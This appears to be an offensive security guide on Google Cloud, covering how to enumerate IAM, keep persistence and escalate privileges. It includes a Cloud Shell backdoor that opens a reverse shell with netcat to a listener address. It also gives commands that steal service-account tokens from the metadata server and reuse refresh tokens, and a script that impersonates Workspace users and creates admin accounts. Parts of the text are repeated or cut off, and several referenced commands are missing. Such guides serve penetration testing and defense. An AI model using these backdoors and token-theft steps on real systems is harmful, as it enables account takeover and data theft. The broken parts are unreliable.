gcp-iam-and-org-policies-enum.md
Now that you have some information about your credentials (and, if you are a red team, hopefully you haven't been detected), it's time to figure out which services are being used in the environment. In the following section you can check some ways to enumerate some common services.
Groups Enumeration
With the permissions serviceusage.services.enable and serviceusage.services.use it's possible to enable services in a project and use them. You could enable the service cloudidentity.googleapis.com if it's disabled and use it to enumerate groups (like it's done in PurplePanda here):
You could also enable the admin service and, if your user has enough privileges in Workspace, you could enumerate all groups with:
gcloud services enable admin.googleapis.com
gcloud beta identity groups preview --customer <workspace-id>
Services Enumeration, Post-
Exploitation & Persistence
GCP has an astonishing number of services. In the following page you will find basic information, enumeration cheatsheets, how to avoid detection, how to obtain persistence, and other post-exploitation tricks about some of them:
gcp-services
gcp-non-svc-persistance.md
Note that you don't need to perform all the work manually, below in this
post you can find a section about automatic tools.
gcp-unauthenticated-enum
Privilege Escalation
The most common way once you have obtained some cloud credentials or
have compromised some service running inside a cloud is to abuse
misconfigured privileges the compromised account may have. So, the first
thing you should do is to enumerate your privileges.
gcp-privilege-escalation
Publicly Exposed Services
While enumerating GCP services you might have found some of them exposing elements to the Internet (VM/Container ports, databases or queue services, snapshots or buckets...). As pentester/red teamer you should always check if you can find sensitive information / vulnerabilities on them as they might provide you further access into the GCP account.
In this book you should find information about how to find exposed GCP services and how to check them. About how to find vulnerabilities in exposed network services I would recommend you to search for the specific service in:
https://book.hacktricks.xyz/
Automatic Tools
In the GCloud console, in https://console.cloud.google.com/iam-admin/asset-inventory/dashboard you can see the resources and IAMs being used by the project.
Here you can see the assets supported by this API: https://cloud.google.com/asset-inventory/docs/supported-asset-types
Check tools that can be used in several clouds here.
gcp_scanner (https://github.com/google/gcp_scanner): This is a GCP resource scanner that can help determine what level of access certain credentials possess on GCP.
# Install
git clone https://github.com/google/gcp_scanner.git
cd gcp_scanner
virtualenv -p python3 venv
source venv/bin/activate
pip install -r requirements.txt
# Execute with gcloud creds
python3 __main__.py -o /tmp/output/ -g "$HOME/.config/gcloud"
# Back to normal
gcloud config unset proxy/address
gcloud config unset proxy/port
gcloud config unset proxy/type
gcloud config unset auth/disable_ssl_validation
gcloud config unset core/custom_ca_certs_file
References
https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-
privileges-in-google-cloud-platform/
Organization
--> Folders
--> Projects
--> Resources
Organization Policies
It's possible to migrate a project that doesn't belong to any organization into an organization with the permissions roles/resourcemanager.projectCreator and roles/resourcemanager.projectMover. If the project is inside another organization, you need to contact GCP support to move it out of that organization first. For more info check this.
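A sketch of how such a migration could be attempted with gcloud (the beta track is assumed here; PROJECT_ID and ORG_ID are placeholders):
gcloud beta projects move PROJECT_ID --organization ORG_ID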
IAM Roles
There are three types of roles in IAM:
IAM policies indicate the permissions principals have over resources via roles, to which granular permissions are assigned. Organization policies restrict how those services can be used or which features are enabled/disabled. This helps to improve the least privilege of each resource in the GCP environment.
gcp-iam-and-org-policies-enum.md
Users & Groups
In the GCP console there isn't any Users or Groups management; that is done in Google Workspace. However, you could synchronize a different identity provider with Google Workspace.
You can also search here predefined roles offered by each product.
grp-gcp-network-admins (required for checklist): Creating networks, subnets, firewall rules, and network devices such as Cloud Router, Cloud VPN, and cloud load balancers.
grp-gcp-billing-admins (required for checklist): Setting up billing accounts and monitoring their usage.
grp-gcp-developers (required for checklist): Designing, coding, and testing applications.
grp-gcp-network-viewer: Reviewing network configurations.
grp-gcp-audit-viewer: Viewing audit logs.
grp-gcp-scc-admin: Administering Security Command Center.
grp-gcp-secrets-admin: Managing secrets in Secret Manager.
Service accounts
You can try the following command to specifically enumerate roles
assigned to your service account project-wide in the current project:
More generally, you can shorten the command to the following to get an
idea of the roles assigned project-wide to all members.
Or to see the IAM policy assigned to a single Compute Instance you can try
the following.
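The commands referenced above are not shown on this page; a sketch of what they typically look like (the filtered variant appears in full later in this section):
# Roles granted project-wide to your service account (PROJECT/ACCOUNT taken from the metadata server)
gcloud projects get-iam-policy $PROJECT \
    --flatten="bindings[].members" \
    --format='table(bindings.role)' \
    --filter="bindings.members:$ACCOUNT"
# Shorter: the whole project IAM policy
gcloud projects get-iam-policy [PROJECT-ID]
# IAM policy of a single Compute Instance
gcloud compute instances get-iam-policy [INSTANCE] --zone [ZONE]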
A custom service account will look like this:
SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com
You can use gcloud config set account [ACCOUNT] to switch identities while trying the various tasks in this blog.
Terraform IAM Policies, Bindings and Memberships
As defined by terraform in https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam, using terraform with GCP there are different ways to grant a principal access over a resource:
Access scopes
You can see what scopes are assigned by querying the metadata URL.
Here is an example from a VM with "default" access assigned:
$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor: Google'
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
https://www.googleapis.com/auth/servicecontrol
https://www.googleapis.com/auth/service.management.readonly
https://www.googleapis.com/auth/trace.append
The most interesting thing in the default scope is devstorage.read_only .
This grants read access to all storage buckets in the project. This can be
devastating, which of course is great for us as an attacker.
curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor: Google'
https://www.googleapis.com/auth/cloud-platform
It is possible to encounter some conflicts when using both IAM and access
scopes. For example, your service account may have the IAM role of
compute.instanceAdmin but the instance you've breached has been
crippled with the scope limitation of
https://www.googleapis.com/auth/compute.readonly . This would
prevent you from making any changes using the OAuth token that's
automatically assigned to your instance.
IAM Roles
There are three types of roles in IAM:
You can also search here predefined roles offered by each product.
Basic roles
roles/viewer (Viewer): Permissions for read-only actions that do not affect state, such as viewing (but not modifying) existing resources or data.
roles/editor (Editor): All viewer permissions, plus permissions for actions that modify state, such as changing existing resources.
roles/owner (Owner): All Editor permissions and permissions for the following actions: manage roles and permissions for a project and all resources within the project; set up billing for a project.
PROJECT=$(curl http://metadata.google.internal/computeMetadata/v1/project/project-id -H "Metadata-Flavor: Google" -s)
ACCOUNT=$(curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email -H "Metadata-Flavor: Google" -s)
gcloud projects get-iam-policy $PROJECT \
    --flatten="bindings[].members" \
    --format='table(bindings.role)' \
    --filter="bindings.members:$ACCOUNT"
Don't worry too much if you get denied access to the command above. It's
still possible to work out what you can do simply by trying to do it.
More generally, you can shorten the command to the following to get an
idea of the roles assigned project-wide to all members.
Or to see the IAM policy assigned to a single Compute Instance you can try
the following.
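A sketch of those two shorter variants (placeholders in brackets):
gcloud projects get-iam-policy $PROJECT
gcloud compute instances get-iam-policy [INSTANCE] --zone [ZONE]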
You can retrieve and inspect the token with the following curl command:
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
{
  "access_token":"ya29.AHES6ZRN3-HlhAPya30GnW_bHSb_QtAS08i85nHq39HE3C2LTrCARA",
  "expires_in":3599,
  "token_type":"Bearer"
}
This token is the combination of the service account and access scopes
assigned to the Compute Instance. So, even though your service account
may have every IAM privilege imaginable, this particular OAuth token
might be limited in the APIs it can communicate with due to access
scopes.
When using one of Google's official GCP client libraries, the code will
automatically go searching for credentials following a strategy called
Application Default Credentials.
1. First, it will check the source code itself. Developers can choose to statically point to a service account key file.
2. The next is an environment variable called
GOOGLE_APPLICATION_CREDENTIALS . This can be set to point to a
service account key file.
3. Finally, if neither of these are provided, the application will revert to
using the default token provided by the metadata server as
described in the section above.
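For example, this is how a developer typically points ADC at a key file (a sketch; the path is hypothetical):
# Any official client library executed afterwards will authenticate as this service account
export GOOGLE_APPLICATION_CREDENTIALS="/path/to/service-account-key.json"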
Finding the actual JSON file with the service account credentials is
generally much more desirable than relying on the OAuth token on the
metadata server. This is because the raw service account credentials can be
activated without the burden of access scopes and without the short
expiration period usually applied to the tokens.
Terraform IAM Policies, Bindings and
Memberships
As defined by terraform in
https://registry.terraform.io/providers/hashicorp/google/latest/docs/resource
s/google_project_iam using terraform with GCP there are different ways to
grant a principal access over a resource:
Create the Service Account to access from github actions with the
desired permissions:
projectId=FIXME
gcloud config set project $projectId

# Give permissions to SA
gitHubRepoName="repo-org/repo-name"
gcloud iam service-accounts add-iam-policy-binding $saId \
    --role "roles/iam.workloadIdentityUser" \
    --member "principalSet://iam.googleapis.com/${poolId}/attribute.${attributeMappingScope}/${gitHubRepoName}"
Note how in the previous member we are specifying the org-name/repo-name. However, it's also possible to allow all of GitHub to access the service account by creating a provider such as the following using a wildcard:
# Create a Workload Identity Pool
poolName=wi-pool2
attribute.{custom_attribute}: principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}
Github
Remember to change ${providerId} and ${saId} for their respective
values:
name: Check GCP action
on:
workflow_dispatch:
pull_request:
branches:
- main
permissions:
id-token: write
jobs:
Get_OIDC_ID_token:
runs-on: ubuntu-latest
steps:
- id: 'auth'
name: 'Authenticate to GCP'
uses: 'google-github-actions/auth@v0'
with:
create_credentials_file: 'true'
workload_identity_provider: '${providerId}'
service_account: '${saId}'
- id: 'gcloud'
name: 'gcloud'
run: |-
gcloud auth login --brief --cred-file="${{ steps.auth.outputs.credentials_file_path }}"
gcloud auth list
gcloud projects list
You can access Google's Cloud Shell from the web console or running
gcloud cloud-shell ssh .
1. Any Google user with access to Google Cloud has access to a fully
authenticated Cloud Shell instance.
2. Said instance will maintain its home directory for at least 120 days
if no activity happens.
3. There are no capabilities for an organisation to monitor the activity of that instance.
This basically means that an attacker may put a backdoor in the home directory of the user and, as long as the user connects to the GC Shell at least every 120 days, the backdoor will survive and the attacker will get a shell every time it's run just by doing:
that, if it exists, is going to be executed every time the user accesses the cloud shell (like in the previous technique). Just insert the previous backdoor, or one like the following, to maintain persistence as long as the user uses the cloud shell "frequently":
#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash
Note that the first time an action is performed in Cloud Shell that
requires authentication, it pops up an authorization window in the user's
browser that must be accepted before the command runs. If an unexpected
pop-up comes up, a target could get suspicious and burn the persistence
method.
Moreover, notice that from the host you can find a service account token:
This is because by default you will be able to use the refresh token as
long as you want to generate new tokens.
To get a new refreshed access token with the refresh token, client ID, and
client secret run:
curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
Service Accounts
Just like with authenticated users, if you manage to compromise the private key file of a service account you will be able to access it, usually for as long as you want. However, if you steal the OAuth token of a service account this can be even more interesting because, even if by default these tokens are useful just for an hour, if the victim deletes the private API key, the OAuth token will still be valid until it expires.
Metadata
Obviously, as long as you are inside a machine running in the GCP environment you will be able to access the service account attached to that machine by contacting the metadata endpoint (note that the OAuth tokens you can access in this endpoint are usually restricted by scopes).
Remediations
Some remediations for these techniques are explained in
https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-
cloud-part-2
Bypassing access scopes
When access scopes are used, the OAuth token that is generated for the
computing instance (VM) will have a scope limitation included. However,
you might be able to bypass this limitation and exploit the permissions the
compromised account has.
The best way to bypass this restriction is either to find new credentials in the compromised host, to find the service account key to generate an OAuth token without restrictions, or to jump to a different, less restricted VM.
It's possible that another box in the environment exists with less restrictive
access scopes. If you can view the output of gcloud compute instances
list --quiet --format=json , look for instances with either the specific
scope you want or the auth/cloud-platform all-inclusive scope.
Also keep an eye out for instances that have the default service account assigned (PROJECT_NUMBER-compute@developer.gserviceaccount.com).
Check if any service account has exported a key at some point with:
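The command is missing from this page; a sketch of what it could look like (SA_EMAIL is a placeholder):
# User-managed (exported) keys of a service account
gcloud iam service-accounts keys list --iam-account "$SA_EMAIL" --managed-by=user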
Or, if generated from the CLI they will look like this:
{
"name": "projects/[PROJECT-ID]/serviceAccounts/[SERVICE-
ACCOUNT-EMAIL]/keys/[KEY-ID]",
"privateKeyType": "TYPE_GOOGLE_CREDENTIALS_FILE",
"privateKeyData": "[PRIVATE-KEY]",
"validAfterTime": "[DATE]",
"validBeforeTime": "[DATE]",
"keyAlgorithm": "KEY_ALG_RSA_2048"
}
If you do find one of these files, you can tell the gcloud command to re-
authenticate with this service account. You can do this on the instance, or
on any machine that has the tools installed.
gcloud auth activate-service-account --key-file [FILE]
Workspace has its own API, completely separate from GCP. Permissions
are granted to Workspace and there isn't any default relation between
GCP and Workspace.
This topic is a bit tricky… your service account has something called a "client_email" which you can see in the JSON credential file you export. It probably looks something like account-name@project-name.iam.gserviceaccount.com. Gitlab has created this Python script that can do two things - list the user
directory and create a new administrative account. Here is how you would
use it:
# Validate access only
./gcp_delegation.py --keyfile ./credentials.json \
--impersonate <user-to-impersonate>@target-org.com \
--domain target-org.com
You can try this script across a range of email addresses to impersonate various users. Standard output will indicate whether or not the service account has access to Workspace, and will include a random password for the new admin account if one is created.
If you have success creating a new admin account, you can log on to the
Google admin console and have full control over everything in G Suite for
every user - email, docs, calendar, etc. Go wild.
References
https://89berner.medium.com/persistant-gcp-backdoors-with-googles-
cloud-shell-2f75c83096ec
https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-
cloud-part-1
https://securityintelligence.com/posts/attacker-achieve-persistence-
google-cloud-platform-cloud-shell/
From
https://github.com/carlospolop/PurplePanda/tree/master/intel/go
ogle#permissions-configuration
roles/bigquery.metadataViewer
roles/composer.user
roles/compute.viewer
roles/container.clusterViewer
roles/iam.securityReviewer
roles/resourcemanager.folderViewer
roles/resourcemanager.organizationViewer
roles/secretmanager.viewer
ScoutSuite
From https://github.com/nccgroup/ScoutSuite/wiki/Google-Cloud-
Platform#permissions
roles/Viewer
roles/iam.securityReviewer
roles/stackdriver.accounts.viewer
CloudSploit
From
https://github.com/aquasecurity/cloudsploit/blob/master/docs/gc
p.md#cloud-provider-configuration
includedPermissions:
- cloudasset.assets.listResource
- cloudkms.cryptoKeys.list
- cloudkms.keyRings.list
- cloudsql.instances.list
- cloudsql.users.list
- compute.autoscalers.list
- compute.backendServices.list
- compute.disks.list
- compute.firewalls.list
- compute.healthChecks.list
- compute.instanceGroups.list
- compute.instances.getIamPolicy
- compute.instances.list
- compute.networks.list
- compute.projects.get
- compute.securityPolicies.list
- compute.subnetworks.list
- compute.targetHttpProxies.list
- container.clusters.list
- dns.managedZones.list
- iam.serviceAccountKeys.list
- iam.serviceAccounts.list
- logging.logMetrics.list
- logging.sinks.list
- monitoring.alertPolicies.list
- resourcemanager.folders.get
- resourcemanager.folders.getIamPolicy
- resourcemanager.folders.list
- resourcemanager.hierarchyNodes.listTagBindings
- resourcemanager.organizations.get
- resourcemanager.organizations.getIamPolicy
- resourcemanager.projects.get
- resourcemanager.projects.getIamPolicy
- resourcemanager.projects.list
- resourcemanager.resourceTagBindings.list
- resourcemanager.tagKeys.get
- resourcemanager.tagKeys.getIamPolicy
- resourcemanager.tagKeys.list
- resourcemanager.tagValues.get
- resourcemanager.tagValues.getIamPolicy
- resourcemanager.tagValues.list
- storage.buckets.getIamPolicy
- storage.buckets.list
Cartography
From https://lyft.github.io/cartography/modules/gcp/config.html
roles/iam.securityReviewer
roles/resourcemanager.organizationViewer
roles/resourcemanager.folderViewer
Starbase
From https://github.com/JupiterOne/graph-google-
cloud/blob/main/docs/development.md
roles/iam.securityReviewer
roles/iam.organizationRoleViewer
roles/bigquery.metadataViewer
GCP - Privilege Escalation
Support HackTricks and get benefits!
Introduction to GCP Privilege
Escalation
GCP, as any other cloud, has some principals: users, groups and service accounts, and some resources like compute engine, cloud functions… Then, via roles, permissions are granted to those principals over the resources. This is the way to specify the permissions a principal has over a resource in GCP. There are certain permissions that will allow a user to get even more permissions on the resource or on third party resources, and that's what is called privilege escalation (also, the exploitation of vulnerabilities to get more permissions).
Obviously, the most interesting privilege escalation techniques are the ones
of the second group because it will allow you to get more privileges
outside of the resources you already have some privileges over. However,
note that escalating in resources may give you also access to sensitive
information or even to other principals (maybe via reading a secret that
contains a token of a SA).
It's also important to note that in GCP Service Accounts are both principals and resources, so escalating privileges over a SA will also allow you to impersonate it.
GCP has hundreds (if not thousands) of permissions that an entity can be
granted. In this book you can find all the permissions that I know that you
can abuse to escalate privileges, but if you know some path not mentioned
here, please share it.
Apikeys Privesc
Cloudbuild Privesc
Cloudfunctions Privesc
Cloudscheduler Privesc
Compute Privesc
Composer Privesc
Container Privesc
Deploymentmanager Privesc
IAM Privesc
Orgpolicy Privesc
Resourcemanager Privesc
Run Privesc
Secretmanager Privesc
Serviceusage Privesc
Storage Privesc
Misc Privesc
gcp-local-privilege-escalation-ssh-pivoting.md
References
https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-
platform-part-1/
https://rhinosecuritylabs.com/cloud-security/privilege-escalation-
google-cloud-platform-part-2/
Therefore, with an API key you can make that company pay for your use of
the API, but you won't be able to escalate privileges.
apikeys.keys.create
This permission allows you to create an API key:
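A sketch of the gcloud call (recent gcloud versions expose the API Keys service as shown below; older ones used the alpha track). A response similar to the truncated JSON that follows is returned:
gcloud services api-keys create --display-name="new-key"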
"name":"projects/5[...]6/locations/global/keys/f707[...]e8",
"uid":"f707[...]e8",
"updateTime":"2022-01-26T12:23:06.378442Z"
}
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here.
apikeys.keys.getKeyString ,
apikeys.keys.list
These permissions allow you to list all the API keys and to get the key string of each of them:
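A sketch with gcloud (older versions may need the alpha track; KEY_ID is a placeholder taken from the list output):
gcloud services api-keys list
gcloud services api-keys get-key-string KEY_ID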
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here.
apikeys.keys.regenerate ,
apikeys.keys.list
These permissions will (potentially) allow you to list and regenerate all the API keys, getting the new key. It's not possible to use this from gcloud but you probably can use it via the API. Once it's supported, the exploitation will be similar to the previous one (I guess).
apikeys.keys.lookup
This is extremely useful to check which GCP project an API key that you have found belongs to:
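A sketch with gcloud (the key string is a placeholder):
gcloud services api-keys lookup <api-key-string>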
You can find the original exploit script here on GitHub (but the location
it's taking the token from didn't work for me). Therefore, check a script to
automate the creation, exploit and cleaning of a vuln environment here
and a python script to get a reverse shell inside of the cloudbuild machine
and steal it here (in the code you can find how to specify other service
accounts).
cloudbuild.builds.update
Potentially with this permission you will be able to update a cloud build
and just steal the service account token like it was performed with the
previous permission (but unfortunately at the time of this writing I couldn't
find any way to call that API).
cloudfunctions.functions.call OR
cloudfunctions.functions.setIamPolicy
cloudfunctions.functions.create
cloudfunctions.functions.sourceCodeSet
iam.serviceAccounts.actAs
The script for this method uses a premade Cloud Function that is included
on GitHub, meaning you will need to upload the associated .zip file and
make it public on Cloud Storage (see the exploit script for more
information). Once the function is created and uploaded, you can either
invoke the function directly or modify the IAM policy to allow you to
invoke the function. The response will include the access token belonging
to the Service Account assigned to that Cloud Function.
The script creates the function and waits for it to deploy, then it runs it and
gets returned the access token.
The exploit scripts for this method can be found here and here and the
prebuilt .zip file can be found here.
cloudfunctions.functions.update ,
iam.serviceAccounts.actAs
Similar to cloudfunctions.functions.create, this method updates
(overwrites) an existing function instead of creating a new one. The API
used to update the function also allows you to swap the Service Account if
you have another one you want to get the token for. The script will
update the target function with the malicious code, then wait for it to
deploy, then finally invoke it to be returned the Service Account access
token.
cloudfunctions.functions.sourceCodeSet
cloudfunctions.functions.update
iam.serviceAccounts.actAs
cloudfunctions.functions.setIamPol
icy , iam.serviceAccounts.actAs
Give yourself any of the previous .update or .create privileges to escalate.
Because we control all aspects of the HTTP request being made from Cloud
Scheduler, we can set it up to hit another Google API endpoint. For
example, if we wanted to create a new job that will use a specific Service
Account to create a new Storage bucket on our behalf, we could run the
following command:
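The command itself is missing here; a sketch of what it could look like (project ID and job name are placeholders):
gcloud scheduler jobs create http test-job \
    --schedule='* * * * *' \
    --http-method=POST \
    --uri='https://storage.googleapis.com/storage/v1/b?project=<project-id>' \
    --message-body='{"name":"new-bucket-name"}' \
    --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com \
    --headers='Content-Type=application/json'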
This command would schedule an HTTP POST request every minute that authenticates as 111111111111-compute@developer.gserviceaccount.com. The request will hit the Cloud Storage API endpoint and will create a new bucket with the name "new-bucket-name".
cloudscheduler.jobs.create
cloudscheduler.locations.list
iam.serviceAccounts.actAs
To escalate our privileges with this method, we just need to craft the
HTTP request of the API we want to hit as the Service Account we pass
in. Instead of a script, you can just use the gcloud command above.
A similar method may be possible with Cloud Tasks, but we were not able
to do it in our testing.
gcp-local-privilege-escalation-ssh-pivoting.md
compute.instances.setMetadata
This permission gives the same privileges as the previous permission but
over a specific instances instead to a whole project. The same exploits and
limitations as for the previous section applies.
compute.instances.setIamPolicy
This kind of permission will allow you to grant yourself a role with the
previous permissions and escalate privileges abusing them.
compute.instances.osLogin
If OSLogin is enabled in the instance, with this permission you can just run
gcloud compute ssh [INSTANCE] and connect to the instance. You won't
have root privs inside the instance.
compute.instances.osAdminLogin
If OSLogin is enabled in the instance, with this permission you can just run
gcloud compute ssh [INSTANCE] and connect to the instance. You will
have root privs inside the instance.
compute.instances.create , iam.serv
iceAccounts.actAs
This method creates a new Compute Engine instance with a specified
Service Account, then sends the token belonging to that Service Account
to an external server.
compute.disks.create
compute.instances.create
compute.instances.setMetadata
compute.instances.setServiceAccount
compute.subnetworks.use
compute.subnetworks.useExternalIp
iam.serviceAccounts.actAs
osconfig.patchDeployments.create |
osconfig.patchJobs.exec
If you have the osconfig.patchDeployments.create or
osconfig.patchJobs.exec permissions you can create a patch job or
deployment. This will enable you to move laterally in the environment and
gain code execution on all the compute instances within a project.
If you want to manually exploit this you will need to create either a patch
job or deployment for a patch job run:
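The same command shown later in this book can be used here (patch.json being a patch-job configuration you craft):
gcloud compute os-config patch-jobs execute --file=patch.json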
Without extra permissions, the credentials are pretty basic as you can just list some resources, but they are useful to find misconfigurations in the environment.
If you don't have this permission you can still access the cluster, but you need to create your own kubectl config file with the cluster's info. A newly generated one looks like this:
apiVersion: v1
clusters:
- cluster:
certificate-authority-data:
LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVMRENDQXBTZ0F3SUJBZ0l
RRzNaQmJTSVlzeVRPR1FYODRyNDF3REFOQmdrcWhraUc5dzBCQVFzRkFEQXYKTV
Mwd0t3WURWUVFERXlRMk9UQXhZVEZoWlMweE56ZGxMVFF5TkdZdE9HVmhOaTAzW
VdFM01qVmhNR05tTkdFdwpJQmNOTWpJeE1qQTBNakl4T1RJMFdoZ1BNakExTWpF
eE1qWXlNekU1TWpSYU1DOHhMVEFyQmdOVkJBTVRKRFk1Ck1ERmhNV0ZsTFRFM04
yVXROREkwWmkwNFpXRTJMVGRoWVRjeU5XRXdZMlkwWVRDQ0FhSXdEUVlKS29aSW
h2Y04KQVFFQkJRQURnZ0dQQURDQ0FZb0NnZ0dCQU00TWhGemJ3Y3VEQXhiNGt5W
ndrNEdGNXRHaTZmb0pydExUWkI4Rgo5TDM4a2V2SUVWTHpqVmtoSklpNllnSHg4
SytBUHl4RHJQaEhXMk5PczFNMmpyUXJLSHV6M0dXUEtRUmtUWElRClBoMy9MMDV
tbURwRGxQK3hKdzI2SFFqdkE2Zy84MFNLakZjRXdKRVhZbkNMMy8yaFBFMzdxN3
hZbktwTWdKVWYKVnoxOVhwNEhvbURvOEhUN2JXUTJKWTVESVZPTWNpbDhkdDZQd
3FUYmlLNjJoQzNRTHozNzNIbFZxaiszNy90RgpmMmVwUUdFOG90a0VVOFlHQ3Fs
RTdzaVllWEFqbUQ4bFZENVc5dk1RNXJ0TW8vRHBTVGNxRVZUSzJQWk1rc0hyCmM
wbGVPTS9LeXhnaS93TlBRdW5oQ2hnRUJIZTVzRmNxdmRLQ1pmUFovZVI1Qk0vc0
w1WFNmTE9sWWJLa2xFL1YKNFBLNHRMVmpiYVg1VU9zMUZIVXMrL3IyL1BKQ2hJT
kRaVTV2VjU0L1c5NWk4RnJZaUpEYUVGN0pveXJvUGNuMwpmTmNjQ2x1eGpOY1Ns
Z01ISGZKRzZqb0FXLzB0b2U3ek05RHlQOFh3NW44Zm5lQm5aVTFnYXNKREZIYVl
ZbXpGCitoQzFETmVaWXNibWNxOGVPVG9LOFBKRjZ3SURBUUFCbzBJd1FEQU9CZ0
5WSFE4QkFmOEVCQU1DQWdRd0R3WUQKVlIwVEFRSC9CQVV3QXdFQi96QWRCZ05WS
FE0RUZnUVU5UkhvQXlxY3RWSDVIcmhQZ1BjYzF6Sm9kWFV3RFFZSgpLb1pJaHZj
TkFRRUxCUUFEZ2dHQkFLbnp3VEx0QlJBVE1KRVB4TlBNbmU2UUNqZDJZTDgxcC9
oeVc1eWpYb2w5CllkMTRRNFVlVUJJVXI0QmJadzl0LzRBQ3ZlYUttVENaRCswZ2
wyNXVzNzB3VlFvZCtleVhEK2I1RFBwUUR3Z1gKbkJLcFFCY1NEMkpvZ29tT3M3U
1lPdWVQUHNrODVvdWEw
REpXLytQRkY1WU5ublc3Z1VLT2hNZEtKcnhuYUVGZAprVVl1TVdPT0d4U29qVnd
mNUsyOVNCbGJ5YXhDNS9tOWkxSUtXV2piWnZPN0s4TTlYLytkcDVSMVJobDZOSV
NqCi91SmQ3TDF2R0crSjNlSjZneGs4U2g2L28yRnhxZWFNdDladWw4MFk4STBZa
GxXVmlnSFMwZmVBUU1NSzUrNzkKNmozOWtTZHFBYlhPaUVOMzduOWp2dVlNN1Zv
QzlNUk1oYUNyQVNhR2ZqWEhtQThCdlIyQW5iQThTVGpQKzlSMQp6VWRpK3dsZ0V
4bnFvVFpBcUVHRktuUTlQcjZDaDYvR0xWWStqYXhuR3lyUHFPYlpNZTVXUDFOUG
s4NkxHSlhCCjc1elFvanEyRUpxanBNSjgxT0gzSkxOeXRTdmt4UDFwYklxTzV4Q
UV0OWxRMjh4N28vbnRuaWh1WmR6M0lCRU8KODdjMDdPRGxYNUJQd0hIdzZtKzZj
UT09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
server: https://34.123.141.28
name: gke_security-devbox_us-central1_autopilot-cluster-1
contexts:
- context:
cluster: gke_security-devbox_us-central1_autopilot-cluster-
1
user: gke_security-devbox_us-central1_autopilot-cluster-1
name: gke_security-devbox_us-central1_autopilot-cluster-1
current-context: gke_security-devbox_us-central1_autopilot-
cluster-1
kind: Config
preferences: {}
users:
- name: gke_security-devbox_us-central1_autopilot-cluster-1
user:
auth-provider:
config:
access-token: <access token>
cmd-args: config config-helper --format=json
cmd-path: gcloud
expiry: "2022-12-06T01:13:11Z"
expiry-key: '{.credential.token_expiry}'
token-key: '{.credential.access_token}'
name: gcp
container.roles.escalate |
container.clusterRoles.escalate
Kubernetes by default prevents principals from being able to create or update Roles and ClusterRoles with more permissions than the ones the principal has. However, a GCP principal with these permissions will be able to create/update Roles/ClusterRoles with more permissions than the ones they hold, effectively bypassing the Kubernetes protection against this behaviour.
container.roles.bind |
container.clusterRoles.bind
Kubernetes by default prevents principals from being able to create or update RoleBindings and ClusterRoleBindings that grant more permissions than the ones the principal has. However, a GCP principal with these permissions will be able to create/update RoleBindings/ClusterRoleBindings granting more permissions than the ones they have, effectively bypassing the Kubernetes protection against this behaviour.
container.roleBindings.create and/or
container.roleBindings.update OR
container.clusterRoleBindings.create and/or
container.clusterRoleBindings.update respectively are also necessary
to perform those privilege escalation actions.
container.cronJobs.create |
container.cronJobs.update |
container.daemonSets.create |
container.daemonSets.update |
container.deployments.create |
container.deployments.update |
container.jobs.create |
container.jobs.update |
container.pods.create |
container.pods.update |
container.replicaSets.create |
container.replicaSets.update |
container.replicationControllers.c
reate |
container.replicationControllers.u
pdate |
container.scheduledJobs.create |
container.scheduledJobs.update |
container.statefulSets.create |
container.statefulSets.update
All these permissions are going to allow you to create or update a resource where you can define a pod. When defining a pod you can specify the SA that is going to be attached and the image that is going to be run, therefore you can run an image that exfiltrates the token of the SA to your server, allowing you to escalate to any service account. For more information check:
As we are in a GCP environment, you will also be able to get the nodepool
GCP SA from the metadata service and escalate privileges in GCP (by
default the compute SA is used).
container.secrets.get |
container.secrets.list
As explained in this page, with these permissions you can read the tokens
of all the SAs of kubernetes, so you can escalate to them.
container.pods.exec
With this permission you will be able to exec into pods, which gives you
access to all the Kubernetes SAs running in pods to escalate privileges
within K8s, but also you will be able to steal the GCP Service Account of
the NodePool, escalating privileges in GCP.
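In practice this is the GCP-level equivalent of being allowed to run something like (pod and namespace names are placeholders):
kubectl exec -it <pod-name> -n <namespace> -- /bin/sh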
container.pods.portForward
As explained in this page, with these permissions you can access local
services running in pods that might allow you to escalate privileges in
Kubernetes (and in GCP if somehow you manage to talk to the metadata
service).
container.serviceAccounts.createTo
ken
Because of the name of the permission, it looks like it will allow you to generate tokens of the K8s Service Accounts, so you would be able to privesc to any SA inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it.
container.mutatingWebhookConfigura
tions.create |
container.mutatingWebhookConfigura
tions.update
These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to persist in the cluster. For more information follow this link.
deploymentmanager.deployments.upda
te
This is like the previous abuse but, instead of creating a new deployment, you modify an already existing one (so be careful).
deploymentmanager.deployments.setI
amPolicy
This is like the previous abuse but, instead of directly creating a new deployment, you first grant yourself that access and then abuse the permission as explained in the previous deploymentmanager.deployments.create section.
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here and a python script to abuse this privilege here.
For more information check the original research.
iam.serviceAccounts.getAccessToken
( iam.serviceAccounts.get )
This permission allows you to request an access token that belongs to a Service Account, so it's possible to request an access token of a Service Account with more privileges than ours.
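A sketch of how this is commonly abused through gcloud (SA_EMAIL is a placeholder for the more privileged service account):
gcloud auth print-access-token --impersonate-service-account="$SA_EMAIL"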
